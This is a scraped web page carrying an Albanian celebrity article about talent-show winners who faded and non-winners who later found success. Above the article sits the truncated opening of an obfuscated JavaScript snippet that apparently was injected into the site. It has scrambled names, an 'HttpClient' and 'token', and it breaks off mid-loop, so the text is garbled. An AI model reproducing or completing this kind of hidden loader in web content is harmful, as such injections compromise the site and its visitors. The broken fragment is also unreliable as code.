;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cilët yje nuk kapën dikur suksesin në spektaklet e talentëve ?!

By

Spektaklet e talenteve përbëjnë hapësirën që trumbetohet si më premtuesja për të arritur sukses në skenën muzikore. Shumë fjalë e premtime të kontratave me kompani diskografike botërore, por në realitet dëgjojmë shumë pak për fituesit pasi që këto kompeticione përfundojnë.

Rina Bilurdagu, Venera Lumani, Sheila Haxhiraj, Ergi Dini, Florent Abrashi e Aslaidon Zaimaj janë vetëm disa nga emrat triumfues në The Voice e X Factor të cilët në industri nuk po arrijnë t’ia dalin të krijojnë hite duke u harruar nga shumica e publikut.

Megjithatë. sikurse edhe në rrafshin botëror dhjetëra artistë që nuk kanë dalë të parët, më pas rrugëtimin e kanë vazhduar edhe më sukesshëm. Një prej rasteve të tilla është fenomeni muzikor me emrin Enca Haxhia.

Ajo nuk ia doli të kalojë fazat në The Voice por kjo ndoshta vetëm sa mund të konsiderohet fat për të. Ku i dihet, ndoshta sot do hynte në thesin e emrave të cilëve kjo eksperiencë nuk i ka sjellë asgjë pos një senzacioni tre-ditor.

Xhensila Myrtezaj, sot një prej emrave më të pëlqyer, dikur e provoi veten në edicionin e katërt të Etheve të dikurshme. Aty, njejtë si Elvana Gjata, Vesa Luma, Linda Halimi, Teuta Kurti e Rona Nishliu u listua vetëm në dhjetëshen më të mirë të spektaklit.

Elhaida Dani që me vokalin e saj të fuqishëm doli e para në Itali, nuk kishte arritur të shkojë as në netët live të ‘Etheve’. Me gjithë vlerësimet e konsideruara profesionale, këta shembuj duhet shërbejnë si leksion që pos talentit, në industrinë muzikore për depërtim duhet përkushtim i madh dhe pak fat sepse kurrë nuk i dihet. Sot je njeri i thjeshtë dhe nesër mund të zgjohesh si yll … /Prive.al/

Artikuj të ngjashëm